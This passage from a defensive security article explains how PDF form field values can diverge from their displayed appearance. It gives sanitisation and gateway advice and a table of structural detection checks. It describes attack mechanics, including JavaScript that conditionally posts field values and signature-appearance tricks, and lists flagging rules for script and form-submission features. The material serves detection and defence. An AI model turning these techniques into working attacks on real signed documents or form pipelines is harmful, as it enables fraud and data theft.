- Never trust /AP for authoritative field values. If you are processing form submissions from a PDF, read /V from the field dictionaries reachable through the AcroForm /Fields array, not text extracted from the appearance stream. Use a library that exposes the AcroForm object model (PyMuPDF, pdfminer, iText) rather than one that renders and OCRs.
- Sanitize before storing: Strip /AP streams and rebuild them from /V when your pipeline is the authoritative writer. This eliminates divergence introduced by upstream tools. qpdf --generate-appearances regenerates appearance streams from field values in files that mark their appearances as out of date (that is, set /NeedAppearances), subject to some documented limitations.
- Reject /NeedAppearances true in signed documents: If your pipeline accepts signed PDFs and treats them as authoritative, a file with /NeedAppearances true and a digital signature should be rejected or flagged for manual review, because the appearance the viewer displays is regenerated rather than taken from the certified bytes.
- Run forms through a static scanner before ingestion: If your system auto-processes form submissions (extract field values, trigger payment, update a record), scan the PDF before extraction. The field-value conditioning pattern, JavaScript that reads /V and posts it conditionally, is detectable statically and is rarely present in legitimately authored forms.
For Enterprise and IT
- Group Policy (Windows): Adobe provides ADMX templates for Acrobat and Reader. Key settings include bEnableJS (disable JavaScript), bEnhancedSecurityInBrowser, and bEnhancedSecurityStandalone. These are available via the Adobe Enterprise Toolkit.
- Email gateway configuration: Most email security gateways support PDF content inspection but vary in how deeply they inspect AcroForm structure. Where possible, configure your gateway to flag PDFs with JavaScript, OpenAction, and SubmitForm for manual review rather than auto-delivering them. /NeedAppearances true in combination with a signature is a narrower, more reliable signal.
- Document verification workflows: For high-value signed documents (contracts, financial forms), consider a two-step verification: signature validation confirming the byte range is intact, followed by a structural audit confirming no V/AP divergence indicators. These are independent checks and both are necessary.
- XFA: XFA forms are deprecated in PDF 2.0 and are not supported by many modern viewers, but Acrobat still renders them. If your environment has no business need to receive XFA forms, blocking them at the gateway eliminates a scripting attack surface that is distinct from AcroForm JavaScript and not always covered by the same scanner rules.
Detection Methodology Reference
The following table summarises the V/AP structural checks documented in this article. All operate on the raw PDF object model and do not require rendering. Severity escalates when indicators combine — the compound patterns in the weighted correlation analysis are documented in the “Correlation Engine Compound Patterns” table above.
| Structural check | What it finds | Severity conditions |
|---|---|---|
| /NeedAppearances true | AP streams are stale by construction: the viewer regenerates from /V at open time | Medium alone; Critical when a digital signature is also present |
| Checkbox/radio /V vs /AS key comparison | Stored data value and displayed appearance state structurally disagree | High; Critical when inside a signed byte range |
| AP stream text extraction (text fields) | Tj/TJ operators reconstructed and compared to /V; literal and hex-string encoding handled | High; Critical when signed |
| AP stream text extraction (listbox/combobox) | Multi-select array extraction; /Opt export→display map resolved before comparison to prevent false positives on choice fields | High; Critical when signed |
| Blank AP stream | AP stream present but contains no text drawing operators: value in file, field renders blank | Medium |
| Missing AP (/V set, no /AP) | Display is viewer-defined via /DA, not statically present in the file | Medium |
| Field-value seeding in JS behavioral analysis | doc.getField() stub receives real /V values; conditional exploitation chains that gate on field content are correctly followed | Applies to any JS indicator elevated by field-value conditioning |
| DocMDP P=1 + DSS-only incremental update | Incremental section contains /DSS or /VRI and no execution vectors, annotations, or form elements; permitted under ISO 32000-2 §12.8.2.2 | Low (informational); full bypass severity if DSS is mixed with any document modification or execution vector |
Marc Kaufman’s observation — that
PDF/Acrobat is “a Roach Motel: features go in but never come out”
— applies equally to the complexity that accumulates around those features
over three decades. The checks above are designed to avoid false positives on
legitimately authored documents; the /Opt export-value resolution
and hex-string /V handling were added specifically to handle valid
authoring patterns that naive string comparison would misread. Edge cases are
possible; the structural indicators raise questions, not verdicts.